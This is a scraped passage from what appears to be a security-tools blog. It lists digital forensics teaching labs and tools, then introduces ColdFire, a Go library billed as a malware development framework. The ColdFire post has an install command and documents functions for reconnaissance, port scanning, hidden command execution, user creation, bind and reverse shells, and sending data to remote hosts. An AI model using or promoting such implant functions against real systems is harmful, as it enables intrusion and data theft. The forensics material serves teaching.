href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_05_USNJournaling.pptx" rel="nofollow" target="_blank" title="File Change History and USN Journal">File Change History and USN Journal</a></td> <td>2M</td> </tr> <tr> <td>Lab 6</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_06_Network_Shellbag_Jumplist.pptx" rel="nofollow" target="_blank" title="Network Evidence and shellbag">Network Evidence and shellbag</a></td> <td>2M</td> </tr> <tr> <td>Lab 7</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_07_NetworkDrive_Cloud.pptx" rel="nofollow" target="_blank" title="Network Drive and Cloud">Network Drive and Cloud</a></td> <td>5M</td> </tr> <tr> <td>Lab 8</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_08_CD_%24MFT.pptx" rel="nofollow" target="_blank" title="Master File Table ($MFT) and Log File ($logFile) Analysis">Master File Table ($MFT) and Log File ($logFile) Analysis</a></td> <td>13M</td> </tr> <tr> <td>Lab 9</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_08_CD_%24MFT.pptx" rel="nofollow" target="_blank" title="Windows Search History">Windows Search History</a></td> <td>4M</td> </tr> <tr> <td>Lab 10</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_10_Vol_Shadow_Copy.pptx" rel="nofollow" target="_blank" title="Windows Volume Shadow Copy Analysis">Windows Volume Shadow Copy Analysis</a></td> <td>6M</td> </tr> <tr> <td>Lab 11</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_11_RecycleBin_AntiForensics.pptx" rel="nofollow" target="_blank" title="Recycle Bin and Anti-Forensics">Recycle Bin and Anti-Forensics</a></td> <td>3M</td> </tr> <tr> <td>Lab 12</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_12_CD-R_Data_Carving.pptx" rel="nofollow" target="_blank" title="Data Carving">Data Carving</a></td> <td>3M</td> </tr> <tr> <td>Lab 13</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_13_Crack_Win10_Login_Password.pptx" rel="nofollow" target="_blank" title="Crack Windows Passwords">Crack Windows Passwords</a></td> <td>2M</td> </tr> </tbody></table><br /> <h3 dir="auto">Investigating Illegal Possession of Images</h3> <p dir="auto">=====================</p> <p dir="auto">The <a href="https://github.com/frankwxu/digital-forensics-lab/tree/main/Illegal_Possession_Images" rel="nofollow" target="_blank" title="case study">case study</a> is to investigate the illegal possession of Rhino images. This image was contributed by Dr. Golden G. Richard III, and was originally used in the DFRWS 2005 RODEO CHALLENGE. NIST hosts the <a href="https://www.cfreds.nist.gov/dfrws/Rhino_Hunt.html" rel="nofollow" target="_blank" title="USB DD image">USB DD image</a>. A copy of the image is also available in the repository.</p> <p dir="auto"><strong>Topics Covered</strong></p> <table> <tbody><tr> <th>Labs</th> <th>Topics Covered</th> <th>Size of PPTs</th> </tr> <tr> <td>Lab 0</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/HTTP_Wireshark_Forensics_1_text.pptx" rel="nofollow" target="_blank" title="HTTP Analysis using Wireshark (text)">HTTP Analysis using Wireshark (text)</a></td> <td>3M</td> </tr> <tr> <td>Lab 1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/HTTP_Wireshark_Forensics_2_image.pptx" rel="nofollow" target="_blank" title="HTTP Analysis using Wireshark (image)">HTTP Analysis using Wireshark (image)</a></td> <td>6M</td> </tr> <tr> <td>Lab 2</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_1_File_Recovering.pptx" rel="nofollow" target="_blank" title="Rhion Possession Investigation 1: File recovering">Rhion Possession Investigation 1: File recovering</a></td> <td>9M</td> </tr> <tr> <td>Lab 3</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_2_Steganography.pptx" rel="nofollow" target="_blank" title="Rhion Possession Investigation 2: Steganography">Rhion Possession Investigation 2: Steganography</a></td> <td>4M</td> </tr> <tr> <td>Lab 4</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_3_FTP_Traffic_crackzip.pptx" rel="nofollow" target="_blank" title="Rhion Possession Investigation 3: Extract Evidence from FTP Traffic">Rhion Possession Investigation 3: Extract Evidence from FTP Traffic</a></td> <td>3M</td> </tr> <tr> <td>Lab 5</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_4_HTTP_Traffic.pptx" rel="nofollow" target="_blank" title="Rhion Possession Investigation 4: Extract Evidence from HTTP Traffic">Rhion Possession Investigation 4: Extract Evidence from HTTP Traffic</a></td> <td>5M</td> </tr> </tbody></table> <h3 dir="auto">Investigating Email Harassment</h3> <p dir="auto">=========</p> <p dir="auto">The <a href="https://github.com/frankwxu/digital-forensics-lab/tree/main/Email_Harassment" rel="nofollow" target="_blank" title="case study">case study</a> is to investigate the harassment email sent by a student to a faculty member. The case is hosted by digitalcorpora.org. You can access the <a href="https://digitalcorpora.org/corpora/scenarios/nitroba-university-harassment-scenario" rel="nofollow" target="_blank" title="senario description">senario description</a> and <a href="http://downloads.digitalcorpora.org/corpora/scenarios/2008-nitroba/nitroba.pcap" rel="nofollow" target="_blank" title="network traffic">network traffic</a> from their website. The repository only provides lab instructions.</p> <p dir="auto"><strong>Topics Covered</strong></p> <table> <tbody><tr> <th>Labs</th> <th>Topics Covered</th> <th>Size of PPTs</th> </tr> <tr> <td>Lab 0</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Email_Harassment/0_Investigate_Harassment_Email_Wireshark.pptx" rel="nofollow" target="_blank" title="Investigating Harassment Email using Wireshark">Investigating Harassment Email using Wireshark</a></td> <td>3M</td> </tr> <tr> <td>Lab 1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Email_Harassment/1_tshark_forensics_Introduction.pptx" rel="nofollow" target="_blank" title="t-shark Forensic Introduction">t-shark Forensic Introduction</a></td> <td>2M</td> </tr> <tr> <td>Lab 2</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/2_Investigate_Harassment_Email_TShark.pptx" rel="nofollow" target="_blank" title="Investigating Harassment Email using t-shark">Investigating Harassment Email using t-shark</a></td> <td>2M</td> </tr> </tbody></table> <h3 dir="auto">Investigating Illegal File Transferring (Memory Forensics )</h3> <p dir="auto">=========</p> <p dir="auto">The <a href="https://github.com/frankwxu/digital-forensics-lab/tree/main/Illegal_File_Transferring_Memory_Forensics" rel="nofollow" target="_blank" title="case study">case study</a> is to investigate computer memory for reconstructing a timeline of illegal data transferring. The case includes a scenario of transfer sensitive files from a server to a USB.</p> <p dir="auto"><strong>Topics Covered</strong></p> <table> <tbody><tr> <th>Labs</th> <th>Topics Covered</th> <th>Size of PPTs</th> </tr> <tr> <td>Lab 0</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_File_Transferring_Memory_Forensics" rel="nofollow" target="_blank" title="Memory Forensics">Memory Forensics</a></td> <td>11M</td> </tr> <tr> <td>part 1</td> <td>Understand the Suspect and Accounts</td> <td></td> </tr> <tr> <td>part 2</td> <td>Understand the Suspect’s PC</td> <td></td> </tr> <tr> <td>part 3</td> <td>Network Forensics</td> <td></td> </tr> <tr> <td>part 4</td> <td>Investigate Command History</td> <td></td> </tr> <tr> <td>part 5</td> <td>Investigate Suspect’s USB</td> <td></td> </tr> <tr> <td>part 6</td> <td>Investigate <a href="https://www.kitploit.com/search/label/Internet%20Explorer" target="_blank" title="Internet Explorer">Internet Explorer</a> History</td> <td></td> </tr> <tr> <td>part 7</td> <td>Investigate File Explorer History</td> <td></td> </tr> <tr> <td>part 8</td> <td>Timeline Analysis</td> <td></td> </tr> </tbody></table> <h3 dir="auto">Investigating Hacking Case</h3> <p dir="auto">=========</p> <p dir="auto">The <a href="https://github.com/frankwxu/digital-forensics-lab/tree/main/NIST_Hacking_Case" rel="nofollow" target="_blank" title="case study">case study</a>, including a disk image provided by <a href="https://www.cfreds.nist.gov/Hacking_Case.html" rel="nofollow" target="_blank" title="NIST">NIST</a> is to investigate a hacker who intercepts internet traffic within range of Wireless Access Points.</p> <p dir="auto"><strong>Topics Covered</strong></p> <table> <tbody><tr> <th>Labs</th> <th>Topics Covered</th> <th>Size of PPTs</th> </tr> <tr> <td>Lab 0</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Hacking_Case/NIST_Hacking_Case.pptx" rel="nofollow" target="_blank" title="Hacking Case">Hacking Case</a></td> <td>8M</td> </tr> </tbody></table> <h3 dir="auto">Investigating Android 10</h3> <p dir="auto">The image is created by Joshua Hickman and hosted by <a href="https://digitalcorpora.org/corpora/cell-phones/android-10" rel="nofollow" target="_blank" title="digitalcorpora">digitalcorpora</a>.</p> <p dir="auto">=========</p> <table> <tbody><tr> <th>Labs</th> <th>Topics Covered</th> <th>Size of PPTs</th> </tr> <tr> <td>Lab 0</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/0_Intro_Pixel3_Andriod10.pptx" rel="nofollow" target="_blank" title="Intro Pixel 3">Intro Pixel 3</a></td> <td>3M</td> </tr> <tr> <td>Lab 1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/1_Pixel3_Image.pptx" rel="nofollow" target="_blank" title="Pixel 3 Image">Pixel 3 Image</a></td> <td>2M</td> </tr> <tr> <td>Lab 2</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/2_Pixel3_Device_Investigation.pptx" rel="nofollow" target="_blank" title="Pixel 3 Device">Pixel 3 Device</a></td> <td>4M</td> </tr> <tr> <td>Lab 3</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/3_Pixel3_System_settings.pptx" rel="nofollow" target="_blank" title="Pixel 3 System Setting">Pixel 3 System Setting</a></td> <td>5M</td> </tr> <tr> <td>Lab 4</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/4_Overivew_App_Life_Cycle.pptx" rel="nofollow" target="_blank" title="Overview: App Life Cycle">Overview: App Life Cycle</a></td> <td>11M</td> </tr> <tr> <td>Lab 5.1.1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_1_1_AOSP_App_Investigations_Messaging.pptx" rel="nofollow" target="_blank" title="AOSP App Investigations: Messaging">AOSP App Investigations: Messaging</a></td> <td>4M</td> </tr> <tr> <td>Lab 5.1.2</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_1_2_AOSP_App_Investigations_Contacts.pptx" rel="nofollow" target="_blank" title="AOSP App Investigations: Contacts">AOSP App Investigations: Contacts</a></td> <td>3M</td> </tr> <tr> <td>Lab 5.1.3</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_1_GMS_App_Investigations_Messaging.pptx" rel="nofollow" target="_blank" title="AOSP App Investigations: Calendar">AOSP App Investigations: Calendar</a></td> <td>1M</td> </tr> <tr> <td>Lab 5.2.1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_2_GMS_App_Investigations_Dialer.pptx" rel="nofollow" target="_blank" title="GMS App Investigations: Messaging">GMS App Investigations: Messaging</a></td> <td>6M</td> </tr> <tr> <td>Lab 5.2.2</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_2_GMS_App_Investigations_Dialer.pptx" rel="nofollow" target="_blank" title="GMS App Investigations: Dialer">GMS App Investigations: Dialer</a></td> <td>2M</td> </tr> <tr> <td>Lab 5.2.3</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_3_GMS_App_Investigations_Maps.pptx" rel="nofollow" target="_blank" title="GMS App Investigations: Maps">GMS App Investigations: Maps</a></td> <td>8M</td> </tr> <tr> <td>Lab 5.2.4</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_4_GMS_App_Investigations_Photos.pptx" rel="nofollow" target="_blank" title="GMS App Investigations: Photos">GMS App Investigations: Photos</a></td> <td>6M</td> </tr> <tr> <td>Lab 5.3.1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_3_1_Third_Party_App_Investigation_kik.pptx" rel="nofollow" target="_blank" title="Third-Party App Investigations: Kik">Third-Party App Investigations: Kik</a></td> <td>4M</td> </tr> <tr> <td>Lab 5.3.2</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/5_3_2_Third_Party_App_Investigation%20_textnow.pptx" rel="nofollow" target="_blank" title="Third-Party App Investigations: textnow">Third-Party App Investigations: textnow</a></td> <td>1M</td> </tr> <tr> <td>Lab 5.3.3</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_3_3_Third_Party_App_Investigation_whatsapp.pptx" rel="nofollow" target="_blank" title="Third-Party App Investigations: whatapp">Third-Party App Investigations: whatapp</a></td> <td>3M</td> </tr> <tr> <td>Lab 6</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/6_Pixel3_rooting.pptx" rel="nofollow" target="_blank" title="Pixel 3 Rooting">Pixel 3 Rooting</a></td> <td>5M</td> </tr> </tbody></table> <h3 dir="auto">Tools Used</h3> <p dir="auto">========</p> <table> <tbody><tr> <th>Name</th> <th>version</th> <th>vendor</th> </tr> <tr> <td>Wine</td> <td>6.0</td> <td><a href="https://source.winehq.org/git/wine.git/" rel="nofollow" target="_blank" title="https://source.winehq.org/git/wine.git/">https://source.winehq.org/git/wine.git/</a></td> </tr> <tr> <td>Vinetto</td> <td>0.98</td> <td><a href="https://github.com/AtesComp/Vinetto" rel="nofollow" target="_blank" title="https://github.com/AtesComp/Vinetto">https://github.com/AtesComp/Vinetto</a></td> </tr> <tr> <td>imgclip</td> <td>05.12.2017</td> <td><a href="https://github.com/Arthelon/imgclip" rel="nofollow" target="_blank" title="https://github.com/Arthelon/imgclip">https://github.com/Arthelon/imgclip</a></td> </tr> <tr> <td>Tree</td> <td>06.01.2020</td> <td><a href="https://github.com/kddeisz/tree" rel="nofollow" target="_blank" title="https://github.com/kddeisz/tree">https://github.com/kddeisz/tree</a></td> </tr> <tr> <td>RegRipper</td> <td>3.0</td> <td><a href="https://github.com/keydet89/RegRipper3.0" rel="nofollow" target="_blank" title="https://github.com/keydet89/RegRipper3.0">https://github.com/keydet89/RegRipper3.0</a></td> </tr> <tr> <td>Windows-Prefetch-Parser</td> <td>05.01.2016</td> <td><a href="https://github.com/PoorBillionaire/Windows-Prefetch-Parser.git" rel="nofollow" target="_blank" title="https://github.com/PoorBillionaire/Windows-Prefetch-Parser.git">https://github.com/PoorBillionaire/Windows-Prefetch-Parser.git</a></td> </tr> <tr> <td>python-evtx</td> <td>05.21.2020</td> <td><a href="https://github.com/williballenthin/python-evtx" rel="nofollow" target="_blank" title="https://github.com/williballenthin/python-evtx">https://github.com/williballenthin/python-evtx</a></td> </tr> <tr> <td>xmlstarlet</td> <td>1.6.1</td> <td><a href="https://github.com/fishjam/xmlstarlet" rel="nofollow" target="_blank" title="https://github.com/fishjam/xmlstarlet">https://github.com/fishjam/xmlstarlet</a></td> </tr> <tr> <td>hivex</td> <td>09.15.2020</td> <td><a href="https://github.com/libguestfs/hivex" rel="nofollow" target="_blank" title="https://github.com/libguestfs/hivex">https://github.com/libguestfs/hivex</a></td> </tr> <tr> <td>libesedb</td> <td>01.01.2021</td> <td><a href="https://github.com/libyal/libesedb" rel="nofollow" target="_blank" title="https://github.com/libyal/libesedb">https://github.com/libyal/libesedb</a></td> </tr> <tr> <td>pasco-project</td> <td>02.09.2017</td> <td><a href="https://annsli.github.io/pasco-project/" rel="nofollow" target="_blank" title="https://annsli.github.io/pasco-project/">https://annsli.github.io/pasco-project/</a></td> </tr> <tr> <td>libpff</td> <td>01.17.2021</td> <td><a href="https://github.com/libyal/libpff" rel="nofollow" target="_blank" title="https://github.com/libyal/libpff">https://github.com/libyal/libpff</a></td> </tr> <tr> <td>USN-Record-Carver</td> <td>05.21.2017</td> <td><a href="https://github.com/PoorBillionaire/USN-Record-Carver" rel="nofollow" target="_blank" title="https://github.com/PoorBillionaire/USN-Record-Carver">https://github.com/PoorBillionaire/USN-Record-Carver</a></td> </tr> <tr> <td>USN-Journal-Parser</td> <td>1212.2018</td> <td><a href="https://github.com/PoorBillionaire/USN-Journal-Parser" rel="nofollow" target="_blank" title="https://github.com/PoorBillionaire/USN-Journal-Parser">https://github.com/PoorBillionaire/USN-Journal-Parser</a></td> </tr> <tr> <td>JLECmd</td> <td>1.4.0.0</td> <td><a href="https://f001.backblazeb2.com/file/EricZimmermanTools/JLECmd.zip" rel="nofollow" target="_blank" title="https://f001.backblazeb2.com/file/EricZimmermanTools/JLECmd.zip">https://f001.backblazeb2.com/file/EricZimmermanTools/JLECmd.zip</a></td> </tr> <tr> <td>libnl-utils</td> <td>3.2.27</td> <td><a href="https://packages.ubuntu.com/xenial/libs/libnl-utils" rel="nofollow" target="_blank" title="https://packages.ubuntu.com/xenial/libs/libnl-utils">https://packages.ubuntu.com/xenial/libs/libnl-utils</a></td> </tr> <tr> <td>time_decode</td> <td>12.13.2020</td> <td><a href="https://github.com/digitalsleuth/time_decode" rel="nofollow" target="_blank" title="https://github.com/digitalsleuth/time_decode">https://github.com/digitalsleuth/time_decode</a></td> </tr> <tr> <td>analyzeMFT</td> <td>2.0.4</td> <td><a href="https://github.com/dkovar/analyzeMFT" rel="nofollow" target="_blank" title="https://github.com/dkovar/analyzeMFT">https://github.com/dkovar/analyzeMFT</a></td> </tr> <tr> <td>libvshadow</td> <td>12.20.2020</td> <td><a href="https://github.com/libyal/libvshadow" rel="nofollow" target="_blank" title="https://github.com/libyal/libvshadow">https://github.com/libyal/libvshadow</a></td> </tr> <tr> <td>recentfilecache-parser</td> <td>02.13.2018</td> <td><a href="https://github.com/prolsen/recentfilecache-parser" rel="nofollow" target="_blank" title="https://github.com/prolsen/recentfilecache-parser">https://github.com/prolsen/recentfilecache-parser</a></td> </tr> </tbody></table> <h2 dir="auto">Contribution</h2> <p dir="auto">=============</p> <ul dir="auto"> <li>Frank Xu</li> <li>Malcolm Hayward</li> <li>Richard (Max) Wheeless</li> </ul><p><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main" rel="nofollow" target="_blank" title="Free hands-on digital forensics labs for students and faculty (117)"><img alt="Free hands-on digital forensics labs for students and faculty (3)" height="1" src="https://github.com/frankwxu/digital-forensics-lab/raw/main" style="max-width: 100%;" width="1" /></a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/frankwxu/digital-forensics-lab" rel="nofollow" target="_blank" title="Download Digital-Forensics-Lab">Download Digital-Forensics-Lab</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-86074918432042342122021-06-08T17:30:00.001-04:002021-06-08T17:30:00.283-04:00ColdFire - Golang Malware Development Library<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-AnqCEvi9z3I/YL1inZeFeOI/AAAAAAAAZ8U/2Y2o04BlGXU9MY9xBzXcEo_MKxtArdx_wCNcBGAsYHQ/s500/Coldfire_1_coldfire.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="500" height="320" src="https://1.bp.blogspot.com/-AnqCEvi9z3I/YL1inZeFeOI/AAAAAAAAZ8U/2Y2o04BlGXU9MY9xBzXcEo_MKxtArdx_wCNcBGAsYHQ/s320/Coldfire_1_coldfire.png" /></a></div><p align="center"><br /></p> <p align="center"> Golang <a href="https://www.kitploit.com/search/label/Malware%20Development" target="_blank" title="malware development">malware development</a> framework</p> <br /><span style="font-size: x-large;"><b>Introduction</b></span><br /> <p>ColdFire provides various methods useful for malware development in Golang.</p> <p>Most functions are compatible with both Linux and Windows operating systems.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Installation</b></span><br /> <p><code>go get github.com/redcode-labs/ColdFire</code></p> <br /><span style="font-size: x-large;"><b>Types of functions included</b></span><br /> <ul> <li>Logging</li> <li>Auxiliary</li> <li>Reconnaissance</li> <li>Evasion</li> <li>Administration</li> <li>Sandbox detection</li> <li>Disruptive</li> </ul> <br /><span style="font-size: x-large;"><b>Documentation</b></span><br /> <br /><span style="font-size: large;"><b>Logging functions</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="func F(s string, arg ...interface{}) string Alias for fmt.Sprintf func PrintGood(msg string) Print good status message func PrintInfo(msg string) Print info status message func PrintError(msg string) Print error status message func PrintWarning(msg string) Print warning status message "><pre><code>func F(s string, arg ...interface{}) string <br /> Alias for fmt.Sprintf<br /><br />func PrintGood(msg string)<br /> Print good status message<br /><br />func PrintInfo(msg string)<br /> Print info status message<br /><br />func PrintError(msg string)<br /> Print error status message<br /> <br />func PrintWarning(msg string)<br /> Print warning status message <br /> <br /></code></pre></div> <br /><span style="font-size: large;"><b>Auxiliary functions</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="func FileToSlice(file string) []string Read from file and return slice with lines delimited with newline. func Contains(s interface{}, elem interface{}) bool Check if interface type contains another interface type. func StrToInt(string_integer string) int Convert string to int. func IntToStr(i int) string Converts int to string. func IntervalToSeconds(interval string) int Converts given time interval to seconds. func RandomInt(min int, max int) int Returns a random int from range. func RandomSelectStr(list []string) string Returns a random selection from slice of strings. func RandomSelectInt(list []int) int Returns a random selection from slice of ints. func RandomSelectStrNested(list [][]string) []string Returns a random selection from nested string slice. func RemoveNewlines(s string) string Removes "\n" and "\r" characters from string. func FullRemove(str string, to_remove string) string Removes all occurences of substring. func RemoveDuplicatesStr(slice []string) []string Removes <a title="Duplicates" href="https://www.kitploit.com/search/label/Duplicates">duplicates</a> from string slice. func RemoveDuplicatesInt(slice []int) []int Removes duplicates from int slice. func ContainsAny(str string, elements []string) bool Returns true if slice contains a string. func RandomString(n int) string Generates random string of length [n] func ExitOnError(e error) Handle errors func Md5Hash(str string) string Returns MD5 checksum of a string func MakeZip(zip_file string, files []string) error Creates a zip archive from a list of files func ReadFile(filename string) (string, error) Read contents of a file. func WriteFile(filename string) error Write contents to a file. func B64d(str string) string Returns a base64 decoded string func B64e(str string) string Returns a base64 encoded string func FileExists(file string) bool Check if file exists. func ParseCidr(cidr string) ([]string, error) Returns a slice containing all possible IP addresses in the given range. "><pre><code>func FileToSlice(file string) []string<br /> Read from file and return slice with lines delimited with newline.<br /><br />func Contains(s interface{}, elem interface{}) bool <br /> Check if interface type contains another interface type.<br /><br />func StrToInt(string_integer string) int <br /> Convert string to int.<br /><br />func IntToStr(i int) string <br /> Converts int to string. <br /><br />func IntervalToSeconds(interval string) int <br /> Converts given time interval to seconds.<br /><br />func RandomInt(min int, max int) int<br /> Returns a random int from range.<br /><br />func RandomSelectStr(list []string) string <br /> Returns a random selection from slice of strings. <br /><br />func RandomSelectInt(list []int) int <br /> Returns a random selection from slice of ints. <br /><br />func RandomSelectStrNested(list [][]string) []string <br /> Returns a random selection from nested string slice.<br /><br />func RemoveNewlines(s string) string <br /> Removes "\n" and "\r" characters from string.<br /><br />func FullRemove(str string, to_remove string) string <br /> Removes all occurences of substring.<br /><br />func RemoveDuplicatesStr(slice []string) []string <br /> Removes duplicates from string slice.<br /><br />func RemoveDuplicatesInt(slice []int) []int <br /> Removes duplicates from int slice.<br /><br />func ContainsAny(str string, elements []string) bool <br /> Returns true if slice contains a string.<br /><br />func RandomString(n int) string<br /> Generates random string of length [n]<br /><br />func ExitOnError(e error)<br /> Handle errors<br /><br />func Md5Hash(str string) string<br /> Returns MD5 checksum of a string<br /><br />func MakeZip(zip_file string, files []string) error <br /> Creates a zip archive from a list of files<br /><br />func ReadFile(filename string) (string, error) <br /> Read contents of a file.<br /><br />func WriteFile(filename string) error <br /> Write contents to a file.<br /><br />func B64d(str string) string <br /> Returns a base64 decoded string<br /><br />func B64e(str string) string <br /> Returns a base64 encoded string<br /><br />func FileExists(file string) bool<br /> Check if file exists. <br /><br />func ParseCidr(cidr string) ([]string, error) <br /> Returns a slice containing all possible IP addresses in the given range.<br /><br /></code></pre></div> <br /><span style="font-size: large;"><b>Reconnaissance functions</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content=" func GetLocalIp() string Returns a local IP address of the machine. func GetGlobalIp() string Returns a global IP address of the machine. func IsRoot() bool Check if user has administrative privilleges. func Processes() (map[int]string, error) Returns all processes' PIDs and their corresponding names. func Iface() string, string Returns name of currently used <a title=" href="https://www.kitploit.com/search/label/Wireless" wireless="">wireless interface and it's MAC address. func Ifaces() []string Returns slice containing names of all local interfaces. func Disks() ([]string, error) Lists local storage devices func Users() []string, err Returns list of known users. func Info() map[string]string Returns basic system information. Possible fields: username, hostname, go_os, os, platform, cpu_num, kernel, core, local_ip, ap_ip, global_ip, mac. If the field cannot be resolved, it defaults to "N/A" value. func DnsLookup(hostname string) ([]string, error) Performs DNS lookup func RdnsLookup(ip string) ([]string, error) Performs reverse DNS lookup func HostsPassive(interval string) []string, err Passively discovers active hosts on a network using ARP monitoring. <a href="https://www.kitploit.com/search/label/Discovery" target="_blank" title="Discovery">Discovery</a> time can be changed using <interval> argument. func FilePermissions(filename string) (bool,bool) Checks if file has read and write permissions. func Portscan(target string, timeout, threads int) []int Returns list of <a href="https://www.kitploit.com/search/label/Open%20Ports" target="_blank" title="open ports">open ports</a> on target. func PortscanSingle(target string, port int) bool Returns true if selected port is open. func BannerGrab(target string, port int) (string, error) Grabs a service banner string from a given port. func Networks() ([]string, error) Returns list of nearby wireless networks. "><pre><code><br />func GetLocalIp() string<br /> Returns a local IP address of the machine.<br /><br />func GetGlobalIp() string<br /> Returns a global IP address of the machine.<br /> <br />func IsRoot() bool<br /> Check if user has administrative privilleges.<br /> <br />func Processes() (map[int]string, error)<br /> Returns all processes' PIDs and their corresponding names.<br /><br />func Iface() string, string<br /> Returns name of currently used wireless interface and it's MAC address. <br /><br />func Ifaces() []string<br /> Returns slice containing names of all local interfaces.<br /> <br />func Disks() ([]string, error) <br /> Lists local storage devices<br /> <br />func Users() []string, err<br /> Returns list of known users.<br /><br />func Info() map[string]string <br /> Returns basic system information. <br /> Possible fields: username, hostname, go_os, os, <br /> platform, cpu_num, kernel, core, local_ip, ap_ip, global_ip, mac.<br /> If the field cannot be resolved, it defaults to "N/A" value.<br /> <br />func DnsLookup(hostname string) ([]string, error) <br /> Performs DNS lookup<br /><br />func RdnsLookup(ip string) ([]string, error) <br /> Performs reverse DNS lookup<br /><br />func HostsPassive(interval string) []string, err<br /> Passively discovers active hosts on a network using ARP monitoring.<br /> Discovery time can be changed using <interval> argument.<br /> <br />func FilePermissions(filename string) (bool,bool) <br /> Checks if file has read and write permissions.<br /> <br />func Portscan(target string, timeout, threads int) []int <br /> Returns list of open ports on target.<br /><br />func PortscanSingle(target string, port int) bool <br /> Returns true if selected port is open.<br /> <br />func BannerGrab(target string, port int) (string, error) <br /> Grabs a service banner string from a given port.<br /> <br />func Networks() ([]string, error) <br /> Returns list of nearby wireless ne tworks.<br /> <br /></code></pre></div> <br /><span style="font-size: large;"><b>Administration functions</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="func CmdOut(command string) string, error Execute a command and return it's output. func CmdOutPlatform(commands map[string]string) (string, error) Executes commands in platform-aware mode. For example, passing {"windows":"dir", "linux":"ls"} will execute different command, based on platform the implant was launched on. func CmdRun(command string) Unlike cmd_out(), cmd_run does not return anything, and prints output and error to STDOUT. func CmdDir(dirs_cmd map[string]string) ([]string, error) Executes commands in directory-aware mode. For example, passing {"/etc" : "ls"} will execute command "ls" under /etc directory. func CmdBlind(command string) Run command without supervision, do not print any output. func CreateUser(username, password string) error Creates a new user on the system. func Bind(port int) Run a bind shell on a given port. func Reverse(host string, port int) Run a reverse shell. func SendDataTcp(host string, port int, data string) error Sends string to a remote host using TCP protocol. func SendDataUdp(host string, port int, data string) error Sends string to a remote host using UDP protocol. func Download(url string) error Downloads a file from url and save it under the same name. func CopyFile(src string, dst string) error Copy a file from one place to another func CurrentDirFiles() []string, error Returns list of files from current directory "><pre><code>func CmdOut(command string) string, error<br /> Execute a command and return it's output.<br /><br />func CmdOutPlatform(commands map[string]string) (string, error) <br /> Executes commands in platform-aware mode.<br /> For example, passing {"windows":"dir", "linux":"ls"} will execute different command, <br /> based on platform the implant was launched on.<br /><br />func CmdRun(command string)<br /> Unlike cmd_out(), cmd_run does not return anything, and prints output and error to STDOUT.<br /><br />func CmdDir(dirs_cmd map[string]string) ([]string, error) <br /> Executes commands in directory-aware mode.<br /> For example, passing {"/etc" : "ls"} will execute command "ls" under /etc directory.<br /><br />func CmdBlind(command string)<br /> Run command without supervision, do not print any output.<br /> <br />func CreateUser(username, password string) error<br /> Creates a new user on the system.<br /> <br />func Bind(port int)<br /> Run a bind shell on a given port.<br /><br />func Reverse(host string, port int)<br /> Run a reverse shell.<br 